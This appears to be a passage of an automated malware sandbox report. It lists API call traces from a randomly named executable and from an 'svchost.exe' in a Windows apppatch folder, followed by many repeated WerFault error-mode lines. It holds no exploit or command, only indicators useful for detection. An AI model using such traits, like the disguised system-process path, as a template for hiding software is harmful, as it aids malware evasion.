Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0152BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	10_2_0152BE40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0152BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	10_2_0152BE40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0152BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	10_2_0152BE40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0152BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,	10_2_0152BE40

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02C844F0 GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,

2_2_02C844F0

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
